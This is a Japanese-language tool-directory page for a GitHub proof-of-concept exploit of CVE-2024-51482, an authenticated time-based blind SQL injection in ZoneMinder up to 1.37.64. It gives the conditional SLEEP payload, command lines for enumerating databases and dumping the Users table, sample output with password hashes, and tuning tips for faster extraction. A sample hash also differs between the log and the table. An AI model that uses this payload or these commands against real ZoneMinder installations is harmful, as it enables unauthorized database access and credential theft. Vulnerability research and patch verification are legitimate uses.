Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-51482-PoC — ZoneMinder CVE-2024-51482(v1.37.* <= 1.37.64)向けの認証済み時間ベースのブラインドSQLインジェクションPoC | Kitploit
ツール/GitHubGitHub/plur1bu5/cve-2024-51482-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubplur1bu5/cve-2024-51482-poc

CVE-2024-51482-PoC

ZoneMinder CVE-2024-51482(v1.37.* <= 1.37.64)向けの認証済み時間ベースのブラインドSQLインジェクションPoC

リポジトリを見る
146ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-51482-PoC

ZoneMinder v1.37.* <= 1.37.64 向けの認証済み時間ベースブラインドSQLインジェクションエクスプロイト

概要

これは、ZoneMinderのイベント管理機能におけるCVE-2024-51482(時間ベースのブラインドSQLインジェクション)の概念実証エクスプロイトです。このエクスプロイトは認証を必要とし、条件付きSLEEPクエリを使用してデータベースからデータを抽出します。

特徴

  • 認証済みエクスプロイト - 資格情報またはセッションCookieでログイン 長さ検出 - 抽出前にバイナリサーチで正確な文字列長を特定
  • 並列抽出 - マルチスレッドによる高速な文字抽出
  • sqlmapスタイルのオプション - データベース、テーブル、カラムの列挙とデータダンプ
  • 安全なデフォルト - 高精度のための3秒遅延、5スレッド
  • 進捗追跡 - 詳細モード付きのリアルタイム抽出進捗
  • クリーンな出力 - ダンプデータの整形されたテーブル表示

要件

pip install requests

クイックスタート

デフォルトモード - 資格情報のダンプ

python3 poc.py -t example.local -u admin -p password

セッションCookieを使用

python3 poc.py -t example.local --cookie 'ZMSESSID_value'

詳細モード

python3 poc.py -t example.local -u admin -p password -v

使用方法

データベースの列挙

python3 poc.py -t example.local -u admin -p password --dbs

テーブルの列挙

python3 poc.py -t example.local -u admin -p password -D zm --tables

カラムの列挙

python3 poc.py -t example.local -u admin -p password -D zm -T Users --columns

特定テーブルのダンプ

python3 poc.py -t example.local -u admin -p password -D zm -T Users --dump

オプション

Required:
  -t, --target TARGET       Target URL (IP, hostname, or full URL)
  
Authentication:
  -u, --username USERNAME   Username for authentication
  -p, --password PASSWORD   Password for authentication
  --cookie COOKIE           Session cookie (ZMSESSID)

Enumeration:
  --dbs                     Enumerate databases
  -D, --database DATABASE   Database to use
  --tables                  Enumerate tables
  -T, --table TABLE         Table to use
  --columns                 Enumerate columns
  --dump                    Dump table data

Performance:
  --delay DELAY             Time delay in seconds (default: 3, safe)
  --threads THREADS         Number of threads (default: 5, safe)
  -v, --verbose             Show extraction progress

パフォーマンスチューニング

セーフモード(推奨)

python3 poc.py -t example.local -u admin -p password --delay 3 --threads 5
  • 速度: パスワードハッシュあたり約2〜3分
  • 精度: 高い

高速モード(エラーが発生する可能性あり)

python3 poc.py -t example.local -u admin -p password --delay 1 --threads 20
  • 速度: パスワードハッシュあたり約30〜60秒
  • 精度: 誤った文字が生成される可能性があります

出力例

[*] Target: http://example.local
[*] Delay: 3s | Threads: 5
[+] Authenticated as admin
[*] Testing vulnerability...
[+] Target is VULNERABLE!

[*] Default mode: Dumping zm.Users credentials...
[*] Dumping data from 'zm.Users'...
[+] Extracted: admin
[+] Extracted: $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm
[+] Extracted: john
[+] Extracted: $2y$10$prZGnazejKcaLq9bKNexXOglBSqOl1hq07LW7AJ/QNqZolbXKfFG.

====================================================================================
| Username   | Password                                                      |
====================================================================================
| admin      | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| john       | $2y$10$prABlsrtyjkiWv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
====================================================================================

[+] 2 entries dumped

動作の仕組み

  1. 認証 - 資格情報でログインするか、提供されたセッションCookieを使用
  2. 脆弱性テスト - 単純なSLEEPペイロードでターゲットが脆弱であることを確認
  3. 長さ検出 - バイナリサーチを使用して正確な文字列長を特定
  4. 並列抽出 - すべての文字位置を同時に抽出
  5. データ表示 - 結果をきれいなテーブルに整形

ペイロード形式

The exploit uses conditional SLEEP:

1 AND (SELECT 1 FROM (SELECT(SLEEP(3-(IF(condition,0,3)))))test)
  • TRUE条件: 遅延なし(0秒)
  • FALSE条件: 完全な遅延(3秒)

トラブルシューティング

不正確な結果

誤った文字が生成される場合(例: $ が 8 になる):

# Increase delay and reduce threads
python3 poc.py -t example.local -u admin -p password --delay 4 --threads 3

遅すぎる場合

抽出が遅すぎる場合:

# Decrease delay and increase threads (may reduce accuracy)
python3 poc.py -t example.local -u admin -p password --delay 2 --threads 10

データが見つからない場合

デフォルトの zm.Users が存在しない場合:

# Enumerate databases first
python3 poc.py -t example.local -u admin -p password --dbs

# Then enumerate tables
python3 poc.py -t example.local -u admin -p password -D database_name --tables

CVE情報

  • CVE ID: CVE-2024-51482
  • 影響を受けるバージョン: ZoneMinder v1.37.* <= 1.37.64
  • 修正バージョン: v1.37.65
  • 脆弱性タイプ: 時間ベースのブラインドSQLインジェクション
  • CVSSスコア: TBD

免責事項

このツールは教育および許可されたセキュリティテストの目的のみに使用してください。

  • 所有していない、またはテストする明示的な許可がないシステムに対してこのツールを使用しないでください
  • コンピュータシステムへの不正アクセスは違法です
  • 作者はこのツールによって引き起こされた誤用や損害について一切責任を負いません
  • セキュリティ評価を実施する前に必ず適切な許可を取得してください

参考

  • NVD - CVE-2024-51482
  • ZoneMinder GitHub

ライセンス

このプロジェクトは教育目的のみで提供されています。責任を持って倫理的に使用してください。


⭐ 参考になった場合は、リポジトリにスターを付けてください!

ツールをダウンロード